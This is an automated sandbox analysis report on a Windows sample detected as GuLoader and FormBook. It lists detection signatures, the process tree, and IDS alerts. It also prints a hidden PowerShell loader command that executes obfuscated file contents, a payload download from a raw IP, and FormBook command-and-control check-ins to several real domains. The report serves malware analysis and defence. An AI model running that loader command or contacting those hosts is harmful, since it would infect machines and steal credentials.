
Windows Analysis Report
Salmebogs(1).exe

Overview

General Information

Sample name: Salmebogs(1).exe
Analysis ID: 1564415
MD5: b5948d19a341bc22c750d129f41a55ae
SHA1: d21d67d41f27eca213fb81f2c5d68fdee27d815d
SHA256: 0f1ec8d7d4cf99bce4bf482009f456a2e210c6d40d22802a196a2151170780ee
Tags: exe, user-lowmal3

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Salmebogs(1).exe (PID: 1016 cmdline: "C:\Users\user\Desktop\Salmebogs(1).exe" MD5: B5948D19A341BC22C750D129F41A55AE)
    • powershell.exe (PID: 5608 cmdline: powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre';$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Stemmeurnes.exe (PID: 5860 cmdline: "C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe" MD5: B5948D19A341BC22C750D129F41A55AE)
        • MLvvJtVcRex.exe (PID: 6620 cmdline: "C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • svchost.exe (PID: 6428 cmdline: "C:\Windows\SysWOW64\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • MLvvJtVcRex.exe (PID: 6404 cmdline: "C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 1096 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.4750377511.0000000003250000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.3693581776.0000000022720000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.4750102999.0000000001380000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

            System Summary

            Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\SysWOW64\svchost.exe", CommandLine: "C:\Windows\SysWOW64\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe" , ParentImage: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe, ParentProcessId: 6620, ParentProcessName: MLvvJtVcRex.exe, ProcessCommandLine: "C:\Windows\SysWOW64\svchost.exe", ProcessId: 6428, ProcessName: svchost.exe
            Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre';$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes), CommandLine: powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre';$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes), CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Salmebogs(1).exe", ParentImage: C:\Users\user\Desktop\Salmebogs(1).exe, ParentProcessId: 1016, ParentProcessName: Salmebogs(1).exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Skopudsningernes=Get-Content -raw 'C:\Users\user\AppData\Roaming\aspern\huslejebelbs\Medkmpede\Neuralgiform.Pre';$Unclog242=$Skopudsningernes.SubString(72152,3);.$Unclog242($Skopudsningernes), ProcessId: 5608, ProcessName: powershell.exe
            Source: Process started; Author: vburov; Data: Command: "C:\Windows\SysWOW64\svchost.exe", CommandLine: "C:\Windows\SysWOW64\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe" , ParentImage: C:\Program Files (x86)\epDAKvnIKaQVaCiwLRpQjLEhPbyZgKawcoEelmvUhzyJvGXLsumZclZWcVBfCwFwBfxu\MLvvJtVcRex.exe, ParentProcessId: 6620, ParentProcessName: MLvvJtVcRex.exe, ProcessCommandLine: "C:\Windows\SysWOW64\svchost.exe", ProcessId: 6428, ProcessName: svchost.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-11-28T10:06:16.974137+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49724 | 212.162.149.63 | 80 | TCP

            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-11-28T10:06:46.269126+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49725 | 165.22.38.185 | 80 | TCP
            2024-11-28T10:07:11.716882+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49729 | 154.88.22.104 | 80 | TCP
            2024-11-28T10:07:26.583828+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49733 | 69.57.163.64 | 80 | TCP
            2024-11-28T10:07:41.784656+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49737 | 104.21.6.17 | 80 | TCP
            2024-11-28T10:07:56.785215+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49741 | 3.75.10.80 | 80 | TCP
            2024-11-28T10:08:12.232707+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49745 | 103.168.172.37 | 80 | TCP

            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-11-28T10:07:03.636386+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49726 | 154.88.22.104 | 80 | TCP
            2024-11-28T10:07:06.293028+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49727 | 154.88.22.104 | 80 | TCP
            2024-11-28T10:07:09.013613+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49728 | 154.88.22.104 | 80 | TCP
            2024-11-28T10:07:18.631747+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49730 | 69.57.163.64 | 80 | TCP
            2024-11-28T10:07:21.216527+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49731 | 69.57.163.64 | 80 | TCP
            2024-11-28T10:07:23.880318+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49732 | 69.57.163.64 | 80 | TCP
            2024-11-28T10:07:33.494131+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49734 | 104.21.6.17 | 80 | TCP
            2024-11-28T10:07:36.272383+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49735 | 104.21.6.17 | 80 | TCP
            2024-11-28T10:07:39.044925+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49736 | 104.21.6.17 | 80 | TCP
            2024-11-28T10:07:48.917661+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49738 | 3.75.10.80 | 80 | TCP
            2024-11-28T10:07:51.489229+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49739 | 3.75.10.80 | 80 | TCP
            2024-11-28T10:07:54.136331+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49740 | 3.75.10.80 | 80 | TCP
            2024-11-28T10:08:04.526932+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49742 | 103.168.172.37 | 80 | TCP
            2024-11-28T10:08:06.770860+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49743 | 103.168.172.37 | 80 | TCP
            2024-11-28T10:08:09.553131+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49744 | 103.168.172.37 | 80 | TCP

            AV Detection

            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; ReversingLabs: Detection: 21%
            Source: Salmebogs(1).exe; ReversingLabs: Detection: 21%
            Source: Yara match; File source: 00000008.00000002.4750377511.0000000003250000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3693581776.0000000022720000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.4750414436.0000000002D70000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000008.00000002.4749234756.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000009.00000002.4750102999.0000000001380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000008.00000002.4750333765.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000006.00000002.3694238419.0000000022D80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\Temp\Stemmeurnes.exe; Joe Sandbox ML: detected
            Source: Salmebogs(1).exe; Joe Sandbox ML: detected
            Source: Salmebogs(1).exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Salmebogs(1).exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: Semiaci.Absorbe$PotboysWsabbathaAbominarUnbraineIvr.stthVate maoG dekryu ndustrsGratinei UndervnNeelaprgaktor t Katharo(La,dsheTUltra orFe ruaraLyophilnRaspninsKaraktepEvenso.iAfstrafrV nillieSkjtelbdShulslb Tillokk' Genera ForsimpKc,clamieHallah sRecipietOscillor grinnieJa akar$TomatpuScryp ozl Nedkasakett,emvDelatine alvinisUndefaujPubianlp Openes BisageraFo raad Sni ter SmaaskoT iotunsHexateutSpea erhTapperiSMaila,lknonpurirOfficeraToxemiaaAthletilEla.ticeTuumbjeoPepoa opReserveeHjarne,lStormfauConfedeblin smelTestame fejlr dt Microc,ReincaruTerapeusPopolarsBagtjsdesailboar Tolvtav .ubobso pbygniDTrea riaOvermenlSuperbaeHypersenFinaleneBssepi.sGrvlingnRemi gtB rgentie reman aDeta.jetOverprou RisikotDrkikkeiG mbleroCycloheTCort deoCh,naner eleporpPo tordiFindelefOverdrei A dedus Weakyp,Kalkuleo idenumrOverbygt Crema,v CriticaPetu tssLitterruNo dige OrbatioCKo trolabjergnilA,drianfPromotikUdsalgsrAarvaagsWheneerLSt ngrio rerinddLokalplsLeopards C phalt.ubspac.Fetichd Interne AllophMrundioreEnnisindLan ingi O tregtNillek eF,mreap-C tacyluFibro.pdbris,remTvrs iteBerigtijKuns ans ndownlsolso.tbSclerozBBundedeeLoranstvOc,lusii Bullyb s rmforsTidsspitPrewelwx DormmiPOncominiForbehod hu tled EnclitlHomotheePoechorsUdsttelo LuvishEFreqfyrxMandssapUnd rsglo muntro MoseloiAbastartFilicalrDiatermHTrn.brnjGriz.lyeS.bdepumR ngvejm flbshue rossamvLanceri Burtyle CheweleC hanne BondmamMisplanpEfterbreForelstnco,peti$CantilaaUncrankcCubiconaSammen,tS oebruhLykketaa idtsamr Goobers KomparRUrm geraStripinm KardioaMegaloct ark,iseSalmonblInsuffitRecidivSDisc.mfiPens,onm B anch,TvillinlMicroneiUlighedsMamoncirFidolacA TalkvapLi,itoroDagsord .noglemhfunktiot Ansigth Poss saopalineFScoopinrTonnageaStriglegMaximilmKulhydreMetabionSponsora StoftrSEkstatilEnforciuFor,alisPrelatieAn,lebep navig oLej kastFigurae SystemrH samplivL nglyi.F gelejrBeboelid Te,lbraAftensmkOb.ekti,Marc raa PolitinBa knina SvovldaMa noliner dicae RedargtAudiber' Sa nci)backv,l 
source: powershell.exe, 00000002.00000002.3452317093.0000000005C3C000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: \System.Core.pdb{ source: powershell.exe, 00000002.00000002.3455082679.00000000072BF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.3455082679.00000000072BF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Stemmeurnes.exe, 00000006.00000003.3576475859.00000000226D0000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000003.3578331629.0000000022885000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.3448936955.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Stemmeurnes.exe, Stemmeurnes.exe, 00000006.00000003.3576475859.00000000226D0000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000003.3578331629.0000000022885000.00000004.00000020.00020000.00000000.sdmp, Stemmeurnes.exe, 00000006.00000002.3693643326.0000000022A30000.00000040.00001000.00020000.00000000.sdmp, svchost.exe
            Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.3448936955.0000000002C17000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.3458185986.0000000008351000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Salmebogs(1).exe; Code function: 0_2_00406370 FindFirstFileW,FindClose, 0_2_00406370
            Source: C:\Users\user\Desktop\Salmebogs(1).exe; Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
            Source: C:\Users\user\Desktop\Salmebogs(1).exe; Code function: 0_2_0040581E GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_0040581E
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 8_2_0076C660 FindFirstFileW,FindNextFileW,FindClose, 8_2_0076C660
            Source: C:\Windows\SysWOW64\svchost.exe; Code function: 4x nop then xor eax, eax, 8_2_00759EB0

            Networking

            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49726 -> 154.88.22.104:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49730 -> 69.57.163.64:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49727 -> 154.88.22.104:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49725 -> 165.22.38.185:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49744 -> 103.168.172.37:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49731 -> 69.57.163.64:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49742 -> 103.168.172.37:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49733 -> 69.57.163.64:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49732 -> 69.57.163.64:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49735 -> 104.21.6.17:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49745 -> 103.168.172.37:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49737 -> 104.21.6.17:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49740 -> 3.75.10.80:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49734 -> 104.21.6.17:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49739 -> 3.75.10.80:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49741 -> 3.75.10.80:80
            Source: Network traffic; Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:49729 -> 154.88.22.104:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49738 -> 3.75.10.80:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49743 -> 103.168.172.37:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49728 -> 154.88.22.104:80
            Source: Network traffic; Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49736 -> 104.21.6.17:80
            Source: DNS query: www.topkapiescortg.xyz
            Source: Joe Sandbox View; IP Address: 103.168.172.37
            Source: Joe Sandbox View; ASN Name: FORTRESSITXUS
            Source: Joe Sandbox View; ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
            Source: Joe Sandbox View; ASN Name: AMAZON-02US
            Source: Joe Sandbox View; ASN Name: DIGITALOCEAN-ASNUS
            Source: Network traffic; Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49724 -> 212.162.149.63:80
            Source: unknown; TCP traffic detected without corresponding DNS query: 212.162.149.63
            Source: global traffic; HTTP traffic detected:
              GET /kybqONxtMLpRGBHO51.bin HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
              Host: 212.162.149.63
              Cache-Control: no-cache
            Source: global traffic; HTTP traffic detected:
              GET /rym4/?8jT4kL=ndVa/RILK9FLDRpgtoZJ+J8IBXYKH57ZDy7Pf7hM0FMVC1dzhL8viYhuuez44cZISqlmpTXSVNjrzOBKappePk6RQICM+G+QyTBiA70rdrzzN+VPX4YC9zgU1gXoNV1ZFV83DTE=&-pmdf=w6-PZpOHNlat HTTP/1.1
              Host: www.carhireheaven.online
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
            Source: global traffic; HTTP traffic detected:
              GET /f425/?8jT4kL=6oWh1fqdSfng0Pjmt4p2Tl7mRdUP/1qrFSh3ZEd4swSnlT4IHTKt/yR7Nn5bH6bsG60HcQ1M+zXYt/C+9G9vrVx9LvwHKTPPcluFpxFk0AZ9f6fsXKxFHhnFilmSMHOH+bDioKs=&-pmdf=w6-PZpOHNlat HTTP/1.1
              Host: www.dy01urj.pro
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
            Source: global traffic; HTTP traffic detected:
              GET /ir2n/?8jT4kL=n0nw8/H3BoTEcN7zdQK4h5Pq0YxvTroU8JdHjhF/1WvMYiVgjVi7rxPCE4QNN9j365ahaJvOAjH+lnxKDIqr8fD4f6QXWf5NwsAjHJc3hwUW8hetWLjodHBwgSRg3Fz4puXvFwU=&-pmdf=w6-PZpOHNlat HTTP/1.1
              Host: www.openhorizons.pro
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
            Source: global traffic; HTTP traffic detected:
              GET /vn7h/?8jT4kL=on6JE3FYRodJdM1x+4K+5pUS6O0RuQSqvYhTcMVIKJIhdKL5ISeoZA3c+V1uZgRVwgcePlNUSouM/yl9PRA+Tn5EEaKvDdwkQb22NNObOIpoGQnkHbmo3oyXaFXcK2lCv3NncTU=&-pmdf=w6-PZpOHNlat HTTP/1.1
              Host: www.topkapiescortg.xyz
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
            Source: global traffic; HTTP traffic detected:
              GET /lo90/?8jT4kL=gXkjcBwJoJePUPP73D1k4nKT6J/2tj39H9Xv2qxWyJxgoYDAQfNx/5lL6sEukOnTtNLESQT8ae5yfHdk/AMkgP5+8UR/3nx2NgYPLGwKf77yIeyRgEv4SQMvZxGfrREQVLHKYMQ=&-pmdf=w6-PZpOHNlat HTTP/1.1
              Host: www.thezensive.work
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
            Source: global traffic; HTTP traffic detected:
              GET /ygu8/?8jT4kL=6HX0pmqtTVFjYjbLFt/yw4MxugQtjNvaEbfW/ZeSy8/cybJx0DosxviF56NjIHg0asFrzBUBKTTcW4Uj0RlF+pFAgVt32CComlEiYuQYw0DYsahVS2dFldI6ksNi8RRjHVW8r7I=&-pmdf=w6-PZpOHNlat HTTP/1.1
              Host: www.lucelight.info
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Language: en-US,en;q=0.9
              Connection: close
              User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
            Source: global traffic; DNS traffic detected: DNS query: www.carhireheaven.online
            Source: global traffic; DNS traffic detected: DNS query: www.dy01urj.pro
            Source: global traffic; DNS traffic detected: DNS query: www.openhorizons.pro
            Source: global traffic; DNS traffic detected: DNS query: www.topkapiescortg.xyz
            Source: global traffic; DNS traffic detected: DNS query: www.thezensive.work
            Source: global traffic; DNS traffic detected: DNS query: www.lucelight.info
            Source: global traffic; DNS traffic detected: DNS query: www.kevmedia.online
            Source: unknown; HTTP traffic detected:
              POST /f425/ HTTP/1.1
              Host: www.dy01urj.pro
              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
              Accept-Encoding: gzip, deflate, br
              Accept-Language: en-US,en;q=0.9
              Origin: http://www.dy01urj.pro
              Referer: http://www.dy01urj.pro/f425/
              Cache-Control: no-cache
              Content-Length: 211
              Connection: close
              Content-Type: application/x-www-form-urlencoded
              User-Agent: Mozilla/5.0 (BB10; Kbd) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.680 Mobile Safari/537.35+
              Data Ascii: 8jT4kL=3q+B2rTmHcyTiZq7hJgRUmK3fME9hHGeNi99Zm5QsCOqzB5AYQKu8Tp/MzEPELCrfJ4jahtZzRbdvbWH+BRaqV5yZ/dgczvSaHDLv2Ag+iUBE6u5EslOOmLqlUe8bQzjw7/DoMRKS792vDVh2kauz4S9qBpU6mBb65zofzXZsoF2S8KO1g5VH3Ic2vSb7GoTNeRwTc8Bs3MV
            Source: global traffic; HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Server: nginx/1.24.0 (Ubuntu)
              Date: Thu, 28 Nov 2024 09:06:46 GMT
              Content-Type: text/html
              Content-Length: 162
              Connection: close
              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0 (Ubuntu)</center></body></html>
            Source: global traffic; HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Date: Thu, 28 Nov 2024 09:07:18 GMT
              Server: Apache
              Content-Length: 389
              Connection: close
              Content-Type: text/html
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: global traffic; HTTP traffic detected:
              HTTP/1.1 404 Not Found
              Date: Thu, 28 Nov 2024 09:07:21 GMT
              Server: Apache
              Content-Length: 389
              Connection: close
              Content-Type: text/html
